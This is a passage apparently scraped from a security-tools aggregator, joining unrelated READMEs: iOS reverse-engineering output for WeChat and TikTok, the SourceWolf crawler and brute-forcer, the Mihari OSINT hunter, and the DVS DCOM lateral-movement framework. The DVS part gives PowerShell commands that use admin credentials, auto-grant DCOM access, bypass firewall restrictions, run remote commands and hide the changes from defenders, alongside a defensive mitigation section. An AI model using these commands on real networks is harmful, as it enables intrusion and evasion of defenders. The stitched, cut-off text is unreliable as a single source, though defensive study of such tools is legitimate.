The scanner can generate a report to record all wrappers, then you can use ida-symbol-wrapper-naming generator to generate ida scripts and implement this wrapper rename and prototype change.

How to Use
> iblessing -m generator -i ida-objc-msg-xref -f WeChat_method-xrefs.iblessing.txt
[*] set output path to /opt/one-btn/tmp/apps/WeChat/Payload
[*] input file is WeChat_method-xrefs.iblessing.txt
[*] start IDAObjMsgXREFGenerator
[*] load method-chain db for version iblessing methodchains,ver:0.2;
[*] table keys chainId,sel,prefix,className,methodName,prevMethods,nextMethods
[-] bad line 104467,0x0,+[TPLock P, ],+,TPLock,P, ,[104426#0x1043b9904],[]
[-] bad line 114905,0x0,?[0x108ce1578 (,],?,0x108ce1578,(,,[114900#0x1011e8c68],[]
[-] bad line 104464,0x0,?[? P, ],?,?,P, ,[104426#0x1043b98a8],[]
[-] bad line 139234,0x0,?[? X
[-] bad line ],?,?,X
[-] bad line ,[139205#0x1013c222c],[]
[+] load storage from disk succeeded!
[*] Generating XREF Scripts ...
[*] saved to /opt/one-btn/tmp/apps/WeChat/Payload/WeChat_method-xrefs.iblessing.txt_ida_objc_msg_xrefs.iblessing.py

> ls -alh WeChat_method- xrefs.iblessing.txt_ida_objc_msg_xrefs.iblessing.py
-rw-r--r-- 1 soulghost wheel 23M Jul 23 16:16 WeChat_method-xrefs.iblessing.txt_ida_objc_msg_xrefs.iblessing.py

> head WeChat_method-xrefs.iblessing.txt_ida_objc_msg_xrefs.iblessing.py
def add_objc_xrefs():
ida_xref.add_cref(0x10036367c, 0x1008c2220, XREF_USER)
ida_xref.add_cref(0x1003636e8, 0x1008c3df8, XREF_USER)
ida_xref.add_cref(0x10036380c, 0x1008c27e8, XREF_USER)
ida_xref.add_cref(0x103add16c, 0x700006e187a8, XREF_USER)
ida_xref.add_cref(0x102cbee0c, 0x101143ee8, XREF_USER)
ida_xref.add_cref(0x10085c92c, 0x1005e9360, XREF_USER)
ida_xref.add_cref(0x10085c8bc, 0x1005e9274, XREF_USER)
ida_xref.add_cref(0x10085c8dc, 0x1005e92bc, XREF_USER)
ida_xref.add_cref(0x10085c8cc, 0x1005e9298, XREF_USER)

Usage Example
We will take TikTok China as an example:
__text:00000001003842D8 sub_1003842CC                           ; CODE XREF: -[BDARVLynxTracker eventV3:params:adExtraData:]+168↑p
__text:00000001003842D8 ; -[BDARVLynxTracker eventV3:params:adExtraData:]+214↑p ...
__text:00000001003842D8 MOV X1, X27
__text:00000001003842DC MOV X2, X19
__text:00000001003842E0 B objc_msgSend
Next, we can generate ida scripts from this report.

Genereate IDA Script for Objc Runtime Function Rename and Prototype Modification
__text:00000001003842CC ; id __usercall objc_msgSend_61@<X0>(id@<X23>, const char *@<X28>, ...)
__text:00000001003842CC _objc_msgSend_61 ; CODE XREF: -[BDARVLynxTracker eventV3:params:adExtraData:]+2CC↑p
__text:00000001003842CC ; -[BDARVLynxTracker eventV3:params:adExtraData:]+320↑p ...
__text:00000001003842CC MOV X0, X23
__text:00000001003842D0 MOV X1, X28
__text:00000001003842D4 B objc_msgSend

Usage Example
iblessing -m scan -i symbol-wrapper -f <path-to-binary> -d 'symbols=_objc_msgSend,_objc_retain,_objc_release'
iblessing -m scan -i symbol-wrapper -f <path-to-binary> -d 'symbols=*'
Next open your IDA -> File -> Script File and load the script, this step may take a long time. And when it is done, You can observe some decompiled code changes:

SourceWolf - Amazingly Fast Response Crawler To Find Juicy Stuff In The Source Code!


Tested environments: Windows, MAC, linux, and windows subsystem for linux (WSL)

What can SourceWolf do?
  • Crawl through responses to find hidden endpoints, either by sending requests, or from the local response files (if any).
  • Create a list of javascript variables found in the source
  • Extract all the social media links from the websites to identify potentially broken links
  • Brute forcing host using a wordlist.
  • Get the status codes for a list of URLs / Filtering out the live domains from a list of hosts.
All the features mentioned above execute with great speed.
  • SourceWolf uses the Session module from the requests library, which means, it reuses the TCP connection, making it really fast.
  • SourceWolf provides you with an option to crawl the responses files locally so that you aren't sending requests again to an endpoint, whose response you already have a copy of.
  • The final endpoints are in a complete form with a host like https://example.com/api/admin are not as /api/admin. This can come useful, when you are scanning a list of hosts.


> python3 sourcewolf.py -h

-l LIST, --list LIST List of javascript URLs
-u URL, --url URL Single URL
-t THREADS, --threads THREADS
Number of concurrent threads to use (default 5)
-o OUTPUT_DIR, --output directory-name OUTPUT_DIR
Store URL response text in a directory for further analysis
-s STATUS_CODE_FILE, --store-status-code STATUS_CODE_FILE
Store the status code in a file
-b BRUTE, --brute BRUTE
Brute force URL with FUZZ keyword (--wordlist must also be used along with this)
-w WORDLIST, --wordlist WORDLIST
Wordlist for brute forcing URL
-v, --verbose Verbose mode (displays all the requests that are being sent)
-c CRAWL_OUTPUT, --crawl-output CRAWL_OUTPUT
Output directory to store the crawled output
-d DELAY, --delay DELAY
Delay i n the requests (in seconds)
--timeout TIMEOUT Maximum time to wait for connection timing out (in seconds)
--headers HEADERS Add custom headers (Must be passed in as {'Token': 'YOUR-TOKEN-HERE'}) --> Dictionary format
--cookies COOKIES Add cookies (Must be passed in as {'Cookie': 'YOUR-COOKIE-HERE'}) --> Dictionary format
--only-success Only print 2XX responses
--local LOCAL Directory with local response files to crawl for
--no-colors Remove colors from the output
--update-info Check for the latest version, and update if required
SourceWolf has 3 modes, which corresponds to it's 3 core features.
  • Crawl response mode:

Complete usage:
  python3 sourcewolf.py -l domains -o output/ -c crawl_output
domains is the list of URLs, which you want to crawl in the format:
output/ is the directory where the response text files of the input file are stored.
They are stored in the format output/2XX, output/3XX, output/4XX, and output/5XX.
output/2XX stores 2XX status code responses, and so on!

crawl_output specified using the -c flag is used to store the output, inside a directory which SourceWolf produces by crawling the HTTP response files, stored inside the output/ directory (currently only endpoints)
The crawl_output/ directory contains:
endpoints - All the endpoints found
jsvars - All the javascript variables
The directory will have more files, as more modules, and features are integrated into SourceWolf.

For a single URL,
  python3 sourcewolf.py -u example.com/api/endpoint -o output/ -c crawl_output
Only the flag -l is replaced by -u, everything else remains the same.

  • Brute force mode

python3 sourcewolf.py -b https://hackerone.com/FUZZ -w /path/to/wordlist -s status
-w flag is optional. If not specified, it will use a default wordlist with 6124 words
SourceWolf replace the FUZZ keyword from the -b value with the words from wordlist, and sends the requests. This enables you to brute force get parameter values as well.
-s will store the output in a file called status
  • Probing mode
Screenshot not included as the output looks similar to crawl response mode.
python3 sourcewolf -l domains -s live
The domains file can have anything like subdomains, endpoints, js files.
The -s flag write the response to the live file.
Both the brute force and probing mode prints all the status codes except 404 by default. You can customize this behavior to print only 2XX responses by using the flag --only-success
SourceWolf also makes use of multithreading.
The default number of threads for all modes is 5. You can increase the number of threads using the -t flag.
In addition to the above three modes, there is an option crawl locally, provided you have them locally, and follow sourcewolf compatible naming conventions.
Store all the responses in a directory, say responses/
python3 sourcewolf.py --local responses/
This will crawl the local directory, and give you the results.

How can this be integrated into your workflow?

Subdomain enumeration
Filter out live subdomains
Store responses and find hidden endpoints / Directory brute forcing
At this point, you will have a lot of endpoints from the target, extracted real time from the web pages at the time of performing the scan.

SourceWolf core purpose is made with a broader vision to crawl through responses not just for discovering hidden endpoints, but also for automating all the tasks which are done by manually searching through the response files.
One such example would be manually searching for any leaked keys in the source.
This core purpose explains the modular way in which the files are written.

To do
  • Generate a custom wordlist for a target from the words obtained in the source.
  • Automate finding any leaked keys.

It is possible to update SourceWolf right from the terminal, without you having to clone the repository again.
SourceWolf checks for updates everytime it runs, and notifies the user if there are any updates available along with a summary of it.

python3 sourcewolf.py --update-info
provides more details on the update

When there are updates available, you must move the update.py file outside of the SourceWolf directory, and run
Warning: This deletes all the files and folders inside your SourceWolf directory
python3 update.py /path/to/SourceWolf
This actually removes the directory, and clones back the repo.

Currently, sourcewolf supports only finding hidden endpoints from the source, but you can expect other features to be integrated in the future.
Where can you contribute?
Contributions are mainly required for integrating more modules, with sourcewolf, though feel free to open a PR even if it's a typo.
Before sending a pull request, ensure that you are on the latest version.
> Open an issue first if you are going to add a new feature to confirm if it's required! You must not be wasting time trying to code a new feature which is not required.

Feel free to open any issues you face.
Ensure that you include your operating system, command which was run, and screenshots if possible while opening an issue, which makes it easier for me to reproduce the issue.
You can also request new features, or enhance existing features by opening an issue.

Naming conventions
To crawl the files locally, you must follow some naming conventions. These conventions are in place for SourceWolf to directly identify the host name, and thereby parse all the endpoints, including the relative ones.
Consider an URL https://example.com/api/
  • Remove the protocol and the trailing slash (if any) from the URL --> example.com/api
  • Replace '/' with '@' --> example.com@api
  • Save the response as a txt file with the file name obtained above.
So the file finally looks like example.com@api.txt

Logo designed by Murugan artworks

Mihari - A Helper To Run OSINT Queries & Manage Results Continuously


Mihari is a helper to run queries & manage results continuously. Mihari can be used for C2, landing page and phishing hunting.

How it works
  • Mihari makes a query against Shodan, Censys, VirusTotal, SecurityTrails, etc. and extracts artifacts (IP addresses, domains, URLs and hashes) from the results.
  • Mihari checks whether a DB (SQLite3 or PostgreSQL) contains the artifacts or not.
    • If it doesn't contain the artifacts:
      • Mihari creates an alert on TheHive. (Optional)
      • Mihari sends a notification to Slack. (Optional)
      • Mihari creates an event on MISP. (Optional)

  • TheHive alert example

  • Slack notification example

  • MISP event example

  • Ruby 2.6+
  • SQLite3
  • libpq
# For Debian / Ubuntu
apt-get install sqlite3 libsqlite3-dev libpq-dev

gem install mihari
Or you can use this tool with Docker.
docker pull ninoseki/mihari

Basic usage
Mihari supports the following services by default.
$ mihari
mihari alerts # Show the alerts on TheHive
mihari binaryedge [QUERY] # BinaryEdge host search by a query
mihari censys [QUERY] # Censys IPv4 search by a query
mihari circl [DOMAIN|SHA1] # CIRCL passive DNS/SSL lookup by a domain or SHA1 certificate fingerprint
mihari crtsh [QUERY] # crt.sh search by a query
mihari dnpedia [QUERY] # DNPedia domain search by a query
mihari dnstwister [DOMAIN] # dnstwister lookup by a domain
mihari free_text [TEXT] # Cross search with search engines by a free text
mihari help [COMMAND] # Describe available commands or one specific command
mihari http_hash # Cross search with search engines by a hash of an HTTP response (SHA256, MD5 and MurmurH ash3)
mihari import_from_json # Give a JSON input via STDIN
mihari onyphe [QUERY] # Onyphe datascan search by a query
mihari otx [IP|DOMAIN] # OTX lookup by an IP or domain
mihari passive_dns [IP|DOMAIN] # Cross search with passive DNS services by an ip or domain
mihari passive_ssl [SHA1] # Cross search with passive SSL services by an SHA1 certificate fingerprint
mihari passivetotal [IP|DOMAIN|EMAIL|SHA1] # PassiveTotal lookup by an ip, domain, email or SHA1 certificate fingerprint
mihari pulsedive [IP|DOMAIN] # Pulsedive lookup by an ip or domain
mihari reverse_whois [EMAIL] # Cross search with reverse whois services by an email
mihari securitytrails [IP|DOMAIN|EMAIL] # SecurityTrails lookup by an ip, domain or email
mihari securitytrails_domain_feed [REGEXP] # SecurityTrails new domain feed search by a regexp
mihari shodan [QUERY] # Shodan host search by a query
mihari ssh_fingerprint [FINGERPRINT] # Cross search with search engines by an SSH fingerprint (e.g. dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0)
mihari status # Show the current configuration status
mihari urlscan [QUERY] # urlscan search by a given query
mihari virustotal [IP|DOMAIN] # VirusTotal resolutions lookup by an ip or domain
mihari zoomeye [QUERY] # ZoomEye search by a query

[--config=CONFIG] # path to config file

Cross searches
Mihari has cross search features. A cross search is a search across a number of services.
You can get aggregated results by using the following commands.
passive_dnsPassive DNS lookup with CIRCL passive DNS, OTX, PassiveTotal, Pulsedive, SecurityTrails and VirusTotal
passive_sslPassive SSL lookup with CIRCL passive SSL and PassiveTotal
reverse_whoisRevese Whois lookup with PassiveTotal and SecurityTrails
http_hashHTTP response hash lookup with BinaryEdge(SHA256), Censys(SHA256), Onyphpe(MD5) and Shodan(MurmurHash3)
free_textFree text lookup with BinaryEdge and Censys
ssh_fingerprintSSH fingerprint lookup with BinaryEdge and Shodan

http_hash command
The usage of http_hash command is a little bit tricky.
$ mihari help http_hash
mihari http_hash

[--title=TITLE] # title
[--description=DESCRIPTION] # description
[--tags=one two three] # tags
[--md5=MD5] # MD5 hash
[--sha256=SHA256] # SHA256 hash
[--mmh3=N] # MurmurHash3 hash

Cross search with search engines by a hash of an HTTP response (SHA256, MD5 and MurmurHash3)
There are 2 ways to use this command.
First one is passing --md5, --sha256 and --mmh3 parameters.
mihari http_hash --md5=881191f7736b5b8cfad5959ca99d2a51 --sha256=b064187ebdc51721708ad98cd89dacc346017cb0fb0457d530032d387f1ff20e --mmh3=-1467534799
Another one is passing --html parameter. In this case, hashes of an HTML file are automatically calculated.
wget http://example.com -O /tmp/index.html
mihari http_hash --html /tmp/index.html

Example usages
# Censys lookup for PANDA C2
mihari censys '("PANDA" AND "SMAdmin" AND "layui")' --title "PANDA C2"

# VirusTotal passive DNS lookup of a FAKESPY host
mihari virustotal "jppost-hi.top" --title "FAKESPY passive DNS"

# You can pass a "defanged" indicator as an input
mihari virustotal "jppost-hi[.]top" --title "FAKESPY passive DNS"

Import from JSON
echo '{ "title": "test", "description": "test", "artifacts": ["", "github.com", ""] }' | mihari import_from_json
The input is a JSON data should have title, description and artifacts key. tags key is an optional parameter.
"title": "test",
"description": "test",
"artifacts": ["", "github.com"],
"tags": ["test"]
KeyDesc.Required or optional
titleA title of an alertRequired
descriptionA description of an alertRequired
artifactsAn array of artifacts (supported data types: ip, domain, url, email, hash)Required
tagsAn array of tagsOptional

Configuration can be done via environment variables or a YAML file.
DATABASEA path to the SQLite database or a DB URL (e.g. postgres://postgres:pass@db.host:5432/somedb)mihari.db
CENSYS_SECRETCensys secret
SLACK_CHANNELSlack channel name#general
Instead of using environment variables, you can use a YAML file for configuration.
mihari virustotal --config /path/to/yaml.yml
The YAML file should be a YAML hash like below:
database: /tmp/mihari.db
thehive_api_endpoint: https://localhost
thehive_api_key: foo
virustotal_api_key: foo
You can check the configuration status via status command.
mihari status

How to create a custom script
Create a class which extends Mihari::Analyzers::Base and implements the following methods.
NameDesc.@returnRequired or optional
#titleA title of an alertStringRequired
#descriptionA description of an alertStringRequired
#artifactsAn array of artifacts (supported data types: ip, domain, url, email, hash)ArrayRequired
#tagsAn array of tagsArrayOptional
require "mihari"

module Mihari
module Analyzers
class Example < Base
def title

def description

def artifacts
["", "example.com"]

def tags

example = Mihari::Analyzers::Example.new
See /examples for more.

Using it with Docker
$ docker run --rm ninoseki/mihari
# Note that you should pass configurations via environment variables
$ docker run --rm ninoseki/mihari -e THEHIVE_API_ENDPOINT="http://THEHIVE_URL" -e THEHIVE_API_KEY="API KEY" mihari
# or
$ docker run --rm ninoseki/mihari --env-file ~/.mihari.env mihari

DVS - D(COM) V(ulnerability) S(canner) AKA Devious Swiss Army Knife


Did you ever wonder how you can move laterally through internal networks? or interact with remote machines without alerting EDRs?
Let's assume that we have a valid credentials, or an active session with access to a remote machine, but we are without an option for executing a process remotely in a known, expected or a highly-monitored method (i.e. WMI, Task Scheduler, WinRM, PowerShell Remoting).
For these scenarios, the DVS framework comes to the rescue.
The DVS framework is a swiss army knife which allows you to enumerate vulnerable functions of remote DCOM objects, launch them and even launch attacks using them.
The framework is being developed with a "Red Team" mindset and uses stealth methods to compromise remote machines.
The DVS framework contains various ways to bypass remote hardening against DCOM by re-enableing DCOM access remotely and automatically grant the required permissions to the attacking user.
The framework can also revert changes on the remote machine to their original state, prior to the attack - hiding these changes from defenders.
Our main insight is that the tool can also execute commands using non-vulnerable DCOM objects through an aqsome technique (Read below about Invoke-RegisterRemoteSchema)
Compatible with PowerShell 2.0 and up

This tool is for testing and educational purposes only. Any other usage for this code is not allowed. Use at your own risk.
The author bears NO responsibility for misuse of this tool.
By using this you accept the fact that any damage caused by the use of this tool is your responsibility.

Registry access - how the DVS framework utilizes that protocol
  • Registry access
    1. Probe port 445 port in order to interact with the remote registry
    2. Check if the remote-registry is enabled
    3. Interact with the remote registry
    4. If AutoGrant mode is flagged, check write permissions. otherwise, check read permissions
  • Standard Registry Provider (If remote-registry denied)
    1. Probe port 135 in order to interact with the "Standard Registry Provider" using WMI
    2. Check if the StdRegProv is accessible
    3. Interact with the Standard Registry Provider
    4. If AutoGrant mode is flagged, check for write permissions, otherwise, check for read permissions

Why is this tool so stealthy?
The DVS tool first checks if principal-identity has access to the remote machine via the following steps:
  • Basic actions
    1. Authentication operations (if SkipRegAuth is not flagged)
      1. If credentials are provided, it creates a "net-only" session. otherwise, it will use the current-logged on session.
      2. Probe registry access.
    2. Check if DCOM feature is enabled
    3. Allow DCOM Access (if AutoGrant flagged), otherwise fail
    4. Check if the logged-on user/provided user and the groups the user is a member of (Via adsi/WindowsIdentity feature), are granted to interact with the DCOM (via remote registry queries)
    5. Grant permissions (if AutoGrant flagged), otherwise, fail
    6. Resolve domain name from remote machine using NetBIOS over TCP(Using NetAPI32, or UDP Packet), if it fails it will try using the registry (HKLM or HKCU Hives)
  • Invoke-DCOMObjectScan
    1. Interact with DCOM objects
    2. Enumerate the DCOM object and find vulnerable functions
    3. Validate exploitation possibility
    4. Generate execution payloads
    5. Fetch personal information about the vulnerable DCOM object
  • Get-ExecutionCommand
    1. Generate execution payloads
  • Invoke-ExecutionCommand
    1. Try to interact with DCOM objects
    2. Execute the commands
  • Invoke-RegisterRemoteSchema
    1. Try to interact with one of the following DCOM Objects:
      • InternetExplorer.Application - InternetExplorer COM Object
      • {D5E8041D-920F-45e9-B8FB-B1DEB82C6E5E} - Another COMObjects belongs to Internet Explorer
      • {C08AFD90-F2A1-11D1-8455-00A0C91F3880} - ShellBrowserWindow
      • {9BA05972-F6A8-11CF-A442-00A0C90A8F39} - ShellWindows
    2. Register remote schema (e.g. http://)
    3. Configure the schema to execute commands from the schema content
    4. Execute the command

Tool components
  • Security rights analyzer - Analyzing principal-identity rights to access the remote DCOM object
  • Remote grant access - Grants logged-on user permissions remotely (In case they were not already granted)
  • DCOM Scanner - Scan and analyze remote/local DCOM objects for vulnerable functions that are provided (Patterns and function names must be specified) When the tool detects a vulnerable function, it will check what arguments the function includes and if the function has the ability to execute commands
  • DCOM command generator - Generates a PowerShell payload in order to execute on the remote machine
  • Report - Generates a CSV report with all the information about the vulnerable DCOM object
  • Command Execution - Execute commands through DCOM objects


  • GPL v3

Tested Scenarios
  • Out-of domain to domain
  • From inside the domain to another domain-joined machine
  • From domain to out-of-domain
  • From current-session to another domain-joined machine

Tested Operating Systems
  • Windows 7 SP1
  • Windows 8.1
  • Windows 10
  • Windows Server 2019

  • Thanks to Rafel Ivgi for mentoring, and helping with the architecture mindset of the tool.
  • Thanks to Yossi Sasi for helping me to optimize the script.
  • Thanks to Gleb Glazkov for writing the mitigation and preventions section

git clone https://github.com/ScorpionesLabs/DVS
powershell -ep bypass
PS> Import-Module .\DVS.psm1
PS> Get-Help Invoke-DCOMObjectScan -Detailed # Get details of the Invoke-DCOMObjectScan command
PS> Get-Help Get-ExecutionCommand -Detailed # Get details of the Get-ExecutionCommand command
PS> Get-Help Invoke-ExecutionCommand -Detailed # Get details of the Invoke-ExecutionCommand command

Invoke-DCOMObjectScan function allows you to scan DCOM objects and find vulnerable functions via a list of patterns or exact function names that you included in a file.
  • Examples:
    1. Enumerates and Scan MMC20.Application (ProgID) object from the attacker machine to the DC01 host without querying the registry.
         Invoke-DCOMObjectScan -Type Single -ObjectName "MMC20.Application" -HostList DC01 -SkipRegAuth -Username "lab\administrator" -Password "Aa123456!" -Verbose
    Note: The tool will not analyze ACL permissions, and when the tool will success, it will resolve all the information about the object, except the details mentioned on the registry(Like object name, executable file, etc.)
    1. Check whether the MMC20.Application (ProgID) object is accessible from the attacker machine to the DC01 host without first querying and verifying the access list of the DCOM object.
         PS> Invoke-DCOMObjectScan -Type Single -ObjectName "MMC20.Application" -HostList DC01 -SkipPermissionChecks -CheckAccessOnly -Verbose
    2. Validates whether the MMC20.Application (ProgID) is applicable through range. If exists, he tool will try to enumerate the information about it. (using the current logged-on user session).
         PS> Invoke-DCOMObjectScan -Type Single -ObjectName "MMC20.Application" -Hostlist "" -CheckAccessOnly -Verbose
    3. Validates if the {00020812-0000-0000-C000-000000000046} CLSID through ip address object exists and accessible. If exists, the tool will resolve the information about it. (By using lab\administrator credentials).
         PS> Invoke-DCOMObjectScan -Type Single -ObjectName "{00020812-0000-0000-C000-000000000046}" -Hostlist "" -CheckAccessOnly -Username "lab\administrator" -Password "Aa123456!" -Verbose   
    4. Scans all the objects stored on a specified path (e.g. C:\Users\USERNAME\Desktop\DVS\objects.txt) through ip address, and finds the function list located in the specified file like vulnerable.txt using the lab\administrator credentials with the following configuration:
      Max depth: 4
      Max results: 1 (1 result for each object)
      AutoGrant mode: If we don't have access to the object or if the DCOM feature is disabled, enable the DCOM feature and perform automatic grant to the relevant DCOM object.
      Finally, revert the machine to the same state as before the attack.
         PS> Invoke-DCOMObjectScan -MaxDepth 4 -Type List -ObjectListFile "C:\Users\USERNAME\Desktop\DVS\objects.txt" -FunctionListFile "C:\Users\USERNAME\Desktop\DVS\vulnerable.txt" -AutoGrant -Username "lab\administrator" -Password "Aa123456!" -Hostlist "" -MaxResults 1 -Verbose
    5. Scans all the objects stored on the available remote machines from the range and finds potential vulnerable functions from the list located on the selected file (e.g. C:\Users\USERNAME\Desktop\DVS\vulnerable.txt).
         PS> Invoke-DCOMObjectScan -MaxDepth 4 -Type All  -FunctionListFile "C:\Users\USERNAME\Desktop\DVS\vulnerable.txt" -Hostlist "" -Verbose

Get-ExecutionCommand function allows to generate a PowerShell payload that will interact and execute with the remote DCOM function with the relevant parameters.
  • Examples:
    1. Checks if the principal-identity is granted to interact with {00020812-0000-0000-C000-000000000046} CLSID object through ip address using lab\administrator credentials, then it will generates the execution command.
         PS> Get-ExecutionCommand -ObjectName "{00020812-0000-0000-C000-000000000046}" -ObjectPath "DDEInitiate" -HostList "" -Username "lab\Administrator" -Password "Aa123456!" -Verbose
    2. Checks for DCOM access,
      In case the principal-identity doesn't have the necessary permissions or the DCOM feature is disabled, the tool will enable the DCOM feature, grants identity access and interacts with MMC20.Application (ProgID) object through ip address using lab\administrator credentials, and will generates you the execution command.
      Finally, it will revert the machine to the same state as before the attack.
         PS> Get-ExecutionCommand -ObjectName "MMC20.Application" -ObjectPath "Document.ActiveView.ExecuteShellCommand" -HostList "" -Username "lab\Administrator" -Password "Aa123456!" -AutoGrant -Verbose
    3. Tries to interact with MMC20.Application (ProgID) object through range using current logged-on session without analyze ACL permissions then it will generates the execution command.
         PS> Get-ExecutionCommand -ObjectName "MMC20.Application" -ObjectPath "Document.ActiveView.ExecuteShellCommand" -HostList "" -SkipPermissionChecks -Verbose
    4. Tries to interact with MMC20.Application (ProgID) object through ip address, without querying the registry.
         PS> Get-ExecutionCommand -ObjectName "MMC20.Application" -ObjectPath "Document.ActiveView.ExecuteShellCommand" -HostList "" -SkipRegAuth -Verbose

Invoke-ExecutionCommand function executes commands via DCOM Object using the logged-on user or provided credentials.
  • Examples:
    1. Checks for DCOM access,
      In case the principal-identity doesn't have the necessary permissions or the DCOM feature is disabled, the tool will enable the DCOM feature, grant access, Interact with MMC20.Application (ProgID) object through the range: using current logged-on user session and Execute the following commands:
      1. Executes cmd.exe /c calc command
      2. Set Frame.Top attribute to 1 Finally, revert the machine to the same state as before the attack.
         PS> Invoke-ExecutionCommand -ObjectName "MMC20.Application" -AutoGrant -Commands @( @{ObjectPath="Document.ActiveView.ExecuteShellCommand"; Arguments=@('cmd.exe',$null,"/c calc","Minimized")},@{ObjectPath="Frame.Top";Arguments=@(1)} ) -HostList "" -Verbose
    2. Tries to interact with MMC20.Application (ProgID) object using lab\administrator credentials through ip address, and executes the following command: cmd.exe /c calc.
         PS> Invoke-ExecutionCommand -ObjectName "MMC20.Application" -Commands @( @{ObjectPath="Document.ActiveView.ExecuteShellCommand"; Arguments=@('cmd.exe',$null,"/c calc","Minimized")}) -HostList "" -Username "lab\administrator" -Password "Aa123456!" -Verbose
    3. Tries to interact with MMC20.Application (ProgID) object using current logged-on user session without analyze ACL permissions, and executes the following command: cmd.exe /c calc.
         PS> Invoke-ExecutionCommand -ObjectName "MMC20.Application" -Commands @( @{ObjectPath="Document.ActiveView.ExecuteShellCommand"; Arguments=@('cmd.exe',$null,"/c calc","Minimized")}) -HostList "" -SkipPermissionChecks -Verbose

Invoke-RegisterRemoteSchema function executes commands via InternetExplorer.Application's object using the logged-on user or provided credentials.
  • ShellBrowserWindow
  • ShellWindows
  • Internet Explorer
  • ielowutil.exe
Note: This object doesn't need any access to local machine hive, it will proceed with the foothold with any user that can access the remote machine!
  • Examples:
    1. Executes cmd /c calc command on range using the current logged-on session, and grant privileges if is needed
         PS> Invoke-RegisterRemoteSchema -HostList "" -Command "cmd /c calc" -AutoGrant -Verbose
    2. Executes cmd /c calc command on remote machine using provided credentials
         PS> Invoke-RegisterRemoteSchema -HostList "" -Command "cmd /c calc" -Username "Administrator" -Password "Aa123456!" -Verbose

Future work
  • Analyze and change firewall rules remotely

Mitigation and Recommendations
MITRE Technique: T1021.003 - Remote Services: Distributed Component Object Model

  • Disable remote DCOM access
    • considerations:
      • Third-party applications dependent on DCOM
      • Remote system management using "Windows Management Instrumentation" will not work
      • Possible problems with COM objects
  • Disallow remote registry access if not required
    Both options are hard to implement in an enterprise environment without an impact on availability.
    Nevertheless, it can be a good hardening option for endpoints that don't need domain remote management. (e.g. standalone endpoints)
  • Enable Domain and Private Profiles in Windows Defender Firewall
    • The DVS tool bypasses this security control by creating a rule in the firewall to allow any Dynamic RPC connection
  • Move to using LAPS in order to reduce the attack surface. If each computer in the domain has a different local administrator password, this account can't be used for lateral movement.
  • Hardening user access rights can prevent this attack
    • By using Group Policy Objects an organization can remove administrators, users and other groups from the list, and move to using a special group/user for central management that does not interactivly log in to other computers
      [Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment\Access this computer from the network]
      In Official hardening guides like CIS the recommend setting of [Access this computer from the network] is with the values of "administrators and Remote Desktop Users or Authenticated users". This recommendations are vulnerable to the DVS tool.
  • Harden the DCOM permissions by removing the rights of administrators from the permissions - Remote Launch and Remote Activation.
    • [Computer Configuration\Windows Settings\Local Policies\Security Options\DCOM]: Machine Launch Restrictions in Security Descriptor Definition Language (SDDL) syntax
  • Use a host-based firewall / application-aware firewall to block DCOM access between computers. Especially for a computer which is not part of the IT or management infrastructure.
  • Application control rules can be used as last circle of security controls to prevent vulnerable processes from spawning dangerous child processes or loading DLLs.
    mmc.exe -> cmd.exe
    explorer.exe -> regsvr.exe
    visio.exe -> wmic.exe
    excel.exe -> Rundll32.exe
    outlook.exe -> cmd.exe
  • Microsoft attack surface reduction rules can be used to prevent vulnerable processes from spawning dangerous child processes.

  • Monitor changes on the registry in the following locations:
    This key is the DCOM permission settings. If they are changed it can mean that an adversary that used the DVS tool has removed the hardenning.
    "The subkeys and registry values associated with the [HKEY_LOCAL_MACHINE\SOFTWARE\Classes] key contain information about an application that is needed to support COM functionality. This information includes such topics as supported data formats, compatibility information, programmatic identifiers, DCOM, and controls." Microsoft dev center referense
      [MACHINE\SOFTWARE\policies\Microsoft\windows NT\DCOM\MachineLaunchRestriction]
    This key change may indicate that the DVS tool has disabled the DCOM remote activation and Remote Lauch restrictions.
  • Use an application aware firewall to block DCOM access between computers. Especially from a computer which is not part of the IT or management infrastructure.
  • Intrusion prevention system (e.g. Snort, Suricata) can be used to detect DCOM protocol which is based on RPC (MS-RPC, MS-RPCE) and Remote registry protocol (MS-RRP).
  • Monitor Windows Defender firewall by enabling audit log on blocked traffic for domain and private profiles.
  • Monitor changes to the following key. It may indicate that the DVS tool has created a rule to bypass the Microsoft Defender Firewall dynamic RPC restrictions.
  • Monitor Windows event logs:
    Enable audit of events. Audit settings that should be enabled on success and failure: Audit account logon events | Audit logon events | Audit object access | NTLM Auditing
    Browse to this registry key: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole] Create new DWORDs with value of '1' called ActivationFailureLoggingLevel | CallFailureLoggingLevel | InvalidSecurityDescriptorLoggingLevel
    • 4624 (Successful Logon) - A blue team can create correlation of events to catch connections from remote machines to DCOM. An example:
      • event ID 4624 - Logon
      • Account Name: SYSTEM
      • Process Name: C:\Windows\System32\services.exe
    • 4680 (Unkown user or bad password) - Will occur when using a wrong user or password
    • 4688 (Process Creation) - Monitor vulnerable processes that create dangerous sub processes using an administrative user. Example:
      • Creator Process Name: C:\Windows\System32\mmc.exe -> New Process Name: C:\Windows\System32\cmd.exe
      • Creator Process Name: C:\Windows\System32\svchost.exe -> New Process Name: C:\Windows\System32\mmc.exe
    • 8002 (NTLM) - Audit Incoming NTLM Traffic that would be blocked. Example:
      • Calling process name: C:\Windows\System32\mmc.exe
      • Calling process user identity: USER
      • Calling process domain identity: DOMAIN
    • 8003 (NTLM) - Audit NTLM authentication in this domain. Example:
      • User: User
      • Domain: DOMAIN
      • Workstation: ATTACKER
      • Process: C:\Windows\System32\mmc.exe / C:\Windows\System32\dllhost.exe / C:\Windows\System32\svchost.exe / C:\Program Files\Internet Explorer\iexplore.exe
      • Logon type: 3
    • 10010 (Microsoft-Windows-DistributedCOM) - The server %1 did not register with DCOM within the required timeout.
    • 10014 (Microsoft-Windows-DistributedCOM) - for failed CLSID activasion due to disabled remote activation settings for COM+.
    • 10015 (Microsoft-Windows-DistributedCOM) - failed DCOM execution due to insufficient permissions.
    • 10016 (Microsoft-Windows-DistributedCOM) - failed DCOM execution due to insufficient permissions. Example:
      • The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID {C2F03A33-21F5-47FA-B4BB-156362A2F239} and APPID {316CDED5-E4AE-4B15-9113-7055D84DCC97} to the user DOMAIN\Scorpiones
    • 10021 (Microsoft-Windows-DistributedCOM) - The launch and activation security descriptor for the COM Server application with APPID {0000000} is invalid.

CrossC2 - Generate CobaltStrike's Cross-Platform Payload


